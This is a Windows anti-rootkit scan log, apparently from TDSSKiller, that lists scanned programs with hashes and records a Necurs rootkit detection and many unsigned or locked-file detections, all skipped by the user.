23:24:25.0679 0x18fc  AvastUI.exe - ok
23:24:25.0939 0x18fc  [ EA6EADF6314E43783BA8EEE79F93F73C, 1A4BC2D8DFBDC37AF85C73DEE76A6EE901EBA188D43856BD2FFA96B79A126F73 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
23:24:26.0069 0x18fc  Sidebar - ok
23:24:26.0089 0x18fc  [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
23:24:26.0109 0x18fc  mctadmin - ok
23:24:26.0139 0x18fc  [ EA6EADF6314E43783BA8EEE79F93F73C, 1A4BC2D8DFBDC37AF85C73DEE76A6EE901EBA188D43856BD2FFA96B79A126F73 ] C:\Program Files (x86)\Windows Sidebar\Sidebar.exe
23:24:26.0169 0x18fc  Sidebar - ok
23:24:26.0179 0x18fc  [ 0FA760BF380B08D0B67B5507CD8B32AA, 0F73A7F64C4FDAB98CD3A865CC54B3A7195761530FCB115B725CC5A9FB738739 ] C:\Windows\System32\mctadmin.exe
23:24:26.0189 0x18fc  mctadmin - ok
23:24:26.0269 0x18fc  GoogleDriveSync - ok
23:24:27.0469 0x18fc  [ 149928767E6C5FE86DBC6BB9F6F50D01, D13705756D1D092781A8A1D84869D42BA19A2BE19A90B4E2375AA2A0ABF0153D ] C:\Users\Joe\AppData\Local\Programs\Google\MusicManager\MusicManager.exe
23:24:27.0692 0x18fc  MusicManager - detected UnsignedFile.Multi.Generic ( 1 )
23:24:27.0692 0x18fc  MusicManager ( UnsignedFile.Multi.Generic ) - warning
23:24:27.0693 0x18fc  Force sending object to P2P due to detect: C:\Users\Joe\AppData\Local\Programs\Google\MusicManager\MusicManager.exe
23:24:27.0722 0x18fc  Object send P2P result: false
23:24:28.0235 0x18fc  [ CA89F91BE8BF778CBAAF0987C13A2C7C, D060107C6C665CBCCB9F28F48C1D0558E5987B7A1BC0F355229EB9B8901EABB0 ] C:\Program Files (x86)\DisplayFusion\DisplayFusion.exe
23:24:28.0419 0x18fc  DisplayFusion - ok
23:24:28.0759 0x18fc  [ 771293BC7EACB6FB7A78F8B7A954F019, DF06F0D0C8E38F17AD155CAB009A5A2969E7638B88AFBC2A75450EB1239ECAB4 ] C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe
23:24:28.0839 0x18fc  Spybot-S&D Cleaning - ok
23:24:29.0291 0x18fc  [ 67E3BD0F8FB0F39C241A2D60CC7D98EF, 09586F6A11AB10BBD38E8C44A88AFA9AD915981B908EEDA20B9AD2C34BFF7543 ] C:\Users\Joe\AppData\Roaming\Spotify\SpotifyWebHelper.exe
23:24:29.0328 0x18fc  Spotify Web Helper - ok
23:24:29.0393 0x18fc  [ C4A9289576AA2F17DAEDA2A7F9469F84, 80DA52D7E58E0864C31881BD38F392F8AF6581FFC44A099C9A201AC01A0D0CE0 ] C:\Program Files (x86)\Hyperdesktop\hyperdesktop.exe
23:24:29.0423 0x18fc  Hyperdesktop - detected UnsignedFile.Multi.Generic ( 1 )
23:24:29.0423 0x18fc  Hyperdesktop ( UnsignedFile.Multi.Generic ) - warning
23:24:29.0853 0x18fc  [ 34E88B1C3C60644C794EFBA02C7011BD, C3ABE0C85B20B7CEB5F069FDDDDA2B3095384A2DB7F1C553406477B780AC957C ] C:\Program Files (x86)\Unified Remote 3\RemoteServerWin.exe
23:24:29.0945 0x18fc  Unified Remote V3 - ok
23:24:30.0215 0x18fc  [ F51BB12D8977D26C1A4CDA348770D9F1, DDA35CD8F8A6591B83821B5180D457740E0B820CCE000BC7FB1B78FB4AEAD3BA ] C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe
23:24:30.0265 0x18fc  SpybotPostWindows10UpgradeReInstall - detected UnsignedFile.Multi.Generic ( 1 )
23:24:30.0265 0x18fc  SpybotPostWindows10UpgradeReInstall ( UnsignedFile.Multi.Generic ) - warning
23:24:30.0295 0x18fc  Skype - ok
23:24:30.0315 0x18fc  Win FW state via NFP2: enabled ( trusted )
23:24:30.0315 0x18fc  ============================================================
23:24:30.0315 0x18fc  Scan finished
23:24:30.0315 0x18fc  ============================================================
23:24:30.0335 0x18f4  Detected object count: 215
23:24:30.0335 0x18f4  Actual detected object count: 215
23:29:46.0551 0x18f4  8299bf85dcfa9606 ( Rootkit.Win32.Necurs.gen ) - skipped by user
23:29:46.0841 0x18f4  8299bf85dcfa9606 ( Rootkit.Win32.Necurs.gen ) - User select action: Skip 
23:29:46.0881 0x18f4  ASRockIOMon ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:46.0881 0x18f4  ASRockIOMon ( UnsignedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0911 0x18f4  BT_WPS_Service ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:46.0911 0x18f4  BT_WPS_Service ( UnsignedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0911 0x18f4  cFosSpeed ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0911 0x18f4  cFosSpeed ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0941 0x18f4  circlass ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0981 0x18f4  circlass ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0981 0x18f4  CLFS ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0981 0x18f4  CLFS ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0981 0x18f4  Compbatt ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0981 0x18f4  Compbatt ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0991 0x18f4  CompositeBus ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0991 0x18f4  CompositeBus ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0991 0x18f4  crcdisk ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0991 0x18f4  crcdisk ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0991 0x18f4  ctxusbm ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0991 0x18f4  ctxusbm ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0991 0x18f4  DfsC ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0991 0x18f4  DfsC ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0991 0x18f4  discache ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0991 0x18f4  discache ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:46.0991 0x18f4  Disk ( LockedFile.Multi.Generic ) - skipped by user
23:29:46.0991 0x18f4  Disk ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0001 0x18f4  drmkaud ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0001 0x18f4  drmkaud ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0001 0x18f4  DXGKrnl ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0001 0x18f4  DXGKrnl ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0001 0x18f4  ebdrv ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0001 0x18f4  ebdrv ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0001 0x18f4  elxstor ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0001 0x18f4  elxstor ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0051 0x18f4  ErrDev ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0051 0x18f4  ErrDev ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0051 0x18f4  exfat ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0051 0x18f4  exfat ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0051 0x18f4  fastfat ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0051 0x18f4  fastfat ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0061 0x18f4  fdc ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0061 0x18f4  fdc ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0061 0x18f4  FileInfo ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0061 0x18f4  FileInfo ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0061 0x18f4  Filetrace ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0061 0x18f4  Filetrace ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0061 0x18f4  flpydisk ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0061 0x18f4  flpydisk ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0061 0x18f4  FltMgr ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0061 0x18f4  FltMgr ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0071 0x18f4  FNETTBOH_305 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0071 0x18f4  FNETTBOH_305 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0071 0x18f4  FNETURPX ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0071 0x18f4  FNETURPX ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0071 0x18f4  FsDepends ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0071 0x18f4  FsDepends ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0071 0x18f4  Fs_Rec ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0071 0x18f4  Fs_Rec ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0071 0x18f4  fvevol ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0071 0x18f4  fvevol ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0071 0x18f4  gagp30kx ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0071 0x18f4  gagp30kx ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0071 0x18f4  GEARAspiWDM ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0071 0x18f4  GEARAspiWDM ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0081 0x18f4  hamachi ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0081 0x18f4  hamachi ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0081 0x18f4  hcw85cir ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0081 0x18f4  hcw85cir ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0081 0x18f4  HdAudAddService ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0081 0x18f4  HdAudAddService ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0081 0x18f4  HDAudBus ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0081 0x18f4  HDAudBus ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0081 0x18f4  HidBatt ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0081 0x18f4  HidBatt ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0091 0x18f4  HidBth ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0091 0x18f4  HidBth ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0091 0x18f4  HidIr ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0091 0x18f4  HidIr ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0091 0x18f4  HidUsb ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0091 0x18f4  HidUsb ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0091 0x18f4  HiPatchService ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:47.0091 0x18f4  HiPatchService ( UnsignedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0091 0x18f4  HpSAMD ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0091 0x18f4  HpSAMD ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0091 0x18f4  HTTP ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0091 0x18f4  HTTP ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0091 0x18f4  hwpolicy ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0091 0x18f4  hwpolicy ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0101 0x18f4  i8042prt ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0101 0x18f4  i8042prt ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0101 0x18f4  iaStorV ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0101 0x18f4  iaStorV ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0101 0x18f4  iirsp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0101 0x18f4  iirsp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0101 0x18f4  IntcAzAudAddService ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0101 0x18f4  IntcAzAudAddService ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0101 0x18f4  intelide ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0101 0x18f4  intelide ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0101 0x18f4  intelppm ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0101 0x18f4  intelppm ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0101 0x18f4  IpFilterDriver ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0101 0x18f4  IpFilterDriver ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0111 0x18f4  IPMIDRV ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0111 0x18f4  IPMIDRV ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0111 0x18f4  IPNAT ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0111 0x18f4  IPNAT ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0111 0x18f4  irda ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0111 0x18f4  irda ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0111 0x18f4  IRENUM ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0111 0x18f4  IRENUM ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0111 0x18f4  irsir ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0111 0x18f4  irsir ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0111 0x18f4  isapnp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0121 0x18f4  isapnp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0121 0x18f4  iScsiPrt ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0121 0x18f4  iScsiPrt ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0121 0x18f4  kbdclass ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0121 0x18f4  kbdclass ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0121 0x18f4  kbdhid ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0121 0x18f4  kbdhid ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0121 0x18f4  KSecDD ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0121 0x18f4  KSecDD ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0121 0x18f4  KSecPkg ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0121 0x18f4  KSecPkg ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0121 0x18f4  ksthunk ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0121 0x18f4  ksthunk ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0121 0x18f4  L1C ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0121 0x18f4  L1C ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0131 0x18f4  lltdio ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0131 0x18f4  lltdio ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0131 0x18f4  LSI_FC ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0131 0x18f4  LSI_FC ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0131 0x18f4  LSI_SAS ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0131 0x18f4  LSI_SAS ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0131 0x18f4  LSI_SAS2 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0131 0x18f4  LSI_SAS2 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0131 0x18f4  LSI_SCSI ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0131 0x18f4  LSI_SCSI ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0131 0x18f4  luafv ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0131 0x18f4  luafv ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0131 0x18f4  megasas ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0131 0x18f4  megasas ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0131 0x18f4  MegaSR ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0131 0x18f4  MegaSR ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  Modem ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  Modem ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  monitor ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  monitor ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  mouclass ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  mouclass ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  mouhid ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  mouhid ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  mountmgr ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  mountmgr ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  mpio ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  mpio ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  mpsdrv ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  mpsdrv ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  MRxDAV ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  MRxDAV ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0141 0x18f4  mrxsmb ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0141 0x18f4  mrxsmb ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0151 0x18f4  mrxsmb10 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0151 0x18f4  mrxsmb10 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0151 0x18f4  mrxsmb20 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0151 0x18f4  mrxsmb20 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0151 0x18f4  msahci ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0151 0x18f4  msahci ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0151 0x18f4  msdsm ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0151 0x18f4  msdsm ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0151 0x18f4  Msfs ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0151 0x18f4  Msfs ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0151 0x18f4  mshidkmdf ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0151 0x18f4  mshidkmdf ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0151 0x18f4  msisadrv ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0151 0x18f4  msisadrv ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0161 0x18f4  MSKSSRV ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0161 0x18f4  MSKSSRV ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0161 0x18f4  MSPCLOCK ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0161 0x18f4  MSPCLOCK ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0161 0x18f4  MSPQM ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0161 0x18f4  MSPQM ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0161 0x18f4  MsRPC ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0161 0x18f4  MsRPC ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0161 0x18f4  mssmbios ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0161 0x18f4  mssmbios ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0161 0x18f4  MSTEE ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0161 0x18f4  MSTEE ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0521 0x18f4  MTConfig ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0521 0x18f4  MTConfig ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0521 0x18f4  Mup ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0521 0x18f4  Mup ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0531 0x18f4  NativeWifiP ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0531 0x18f4  NativeWifiP ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0531 0x18f4  NDIS ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0531 0x18f4  NDIS ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0531 0x18f4  NdisCap ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0531 0x18f4  NdisCap ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0531 0x18f4  NdisTapi ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0531 0x18f4  NdisTapi ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0541 0x18f4  Ndisuio ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0541 0x18f4  Ndisuio ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0541 0x18f4  NdisWan ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0541 0x18f4  NdisWan ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0541 0x18f4  NDProxy ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0541 0x18f4  NDProxy ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0541 0x18f4  NetBIOS ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0541 0x18f4  NetBIOS ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0551 0x18f4  NetBT ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0551 0x18f4  NetBT ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0551 0x18f4  nfrd960 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0551 0x18f4  nfrd960 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0551 0x18f4  Npfs ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0551 0x18f4  Npfs ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0551 0x18f4  nsiproxy ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0551 0x18f4  nsiproxy ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0561 0x18f4  Ntfs ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0561 0x18f4  Ntfs ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0561 0x18f4  Null ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0561 0x18f4  Null ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0561 0x18f4  nvraid ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0561 0x18f4  nvraid ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0561 0x18f4  nvstor ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0561 0x18f4  nvstor ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0572 0x18f4  nv_agp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0572 0x18f4  nv_agp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0574 0x18f4  ohci1394 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0574 0x18f4  ohci1394 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0576 0x18f4  Parport ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0576 0x18f4  Parport ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0579 0x18f4  partmgr ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0580 0x18f4  partmgr ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0581 0x18f4  pci ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0581 0x18f4  pci ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0586 0x18f4  pciide ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0586 0x18f4  pciide ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0586 0x18f4  pcmcia ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0586 0x18f4  pcmcia ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0589 0x18f4  pcw ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0589 0x18f4  pcw ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0591 0x18f4  PEAUTH ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0591 0x18f4  PEAUTH ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0593 0x18f4  PptpMiniport ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0593 0x18f4  PptpMiniport ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0593 0x18f4  Processor ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0593 0x18f4  Processor ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0593 0x18f4  Psched ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0593 0x18f4  Psched ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0593 0x18f4  ql2300 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0593 0x18f4  ql2300 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0603 0x18f4  ql40xx ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0603 0x18f4  ql40xx ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0603 0x18f4  QWAVEdrv ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0603 0x18f4  QWAVEdrv ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0603 0x18f4  RasAcd ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0603 0x18f4  RasAcd ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0603 0x18f4  RasAgileVpn ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0603 0x18f4  RasAgileVpn ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0603 0x18f4  Rasl2tp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0603 0x18f4  Rasl2tp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0613 0x18f4  RasPppoe ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0613 0x18f4  RasPppoe ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0613 0x18f4  RasSstp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0613 0x18f4  RasSstp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0613 0x18f4  rdbss ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0613 0x18f4  rdbss ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0613 0x18f4  rdpbus ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0613 0x18f4  rdpbus ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0623 0x18f4  RDPCDD ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0623 0x18f4  RDPCDD ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0623 0x18f4  RDPENCDD ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0623 0x18f4  RDPENCDD ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0623 0x18f4  RDPREFMP ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0623 0x18f4  RDPREFMP ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0623 0x18f4  RDPWD ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0623 0x18f4  RDPWD ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0633 0x18f4  rdyboost ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0633 0x18f4  rdyboost ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0633 0x18f4  rspndr ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0633 0x18f4  rspndr ( LockedFile.Multi.Generic ) - User select action: Skip 
